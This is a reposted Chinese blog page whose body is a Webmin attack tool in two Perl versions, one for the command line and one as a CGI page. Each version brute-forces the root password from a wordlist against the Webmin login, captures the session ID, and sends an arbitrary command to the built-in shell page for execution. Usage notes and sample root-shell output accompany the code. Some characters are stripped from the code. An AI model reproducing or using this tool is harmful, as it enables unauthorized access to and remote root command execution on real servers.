Webmin 暴力破解+ 執行命令(轉)[@more@]Webmin是一個廣泛使用的，執行在linux/unix下,用瀏覽器來管理系統的工具。用它，你不必知道複雜的命令列，也不用瞭解各種複雜的配置檔案，系統管理變得非常簡單！可以設定帳號，配置DNS和檔案共享等． Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo - "> # v1.5:By ZzagorR - - ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5 "; print "usage: "; print " webmin15.pl "; print "example: "; print " webmin15.pl "id" wordlist.txt "; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "############################# "; print results "Webmin BruteForce + Command execution v1.5 "; print results "Host:$host "; print results "############################# "; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist "; print results "[-] Webmin on this host does not exist "; exit; }else{ $sock->close; print "[+] BruteForcing... "; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass "; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid "; print "[+] Password : $pass "; print results "[+]:Password:$pass Sid:$sid "; } } } $sock->close; print results "[-]$pass "; } print "[+] Connecting to host once again "; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution "; print results "[-] Cant Connect once again for command execution "; } print "[+] Connected.. Sending Buffer "; my $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd "; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1." ";} if ($answer=~/

>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/

/g){ exit; } else { print $answer; print results "[+]$answer "; } } } } #!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~ Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - Ablo_2@012.net.il
v1.5:By ZzagorR - -
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/

>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/

/g){ exit; } else { print $answer; } } } } } if($atak eq ""){ print qq~

Webmin Web Brute Force v1.5 - cgi version

來自 “ ITPUB部落格 ” ，連結：http://blog.itpub.net/10617542/viewspace-949065/，如需轉載，請註明出處，否則將追究法律責任。

上一篇： linux 對硬體有絕對不相容的嗎?(轉)

下一篇：糾正14條查殺電腦病毒的錯誤認識(轉)

請登入後發表評論登入

全部評論

BSDLite

博文量
1872
訪問量

3928589

Webmin 暴力破解+ 執行命令(轉)

最新文章

相關文章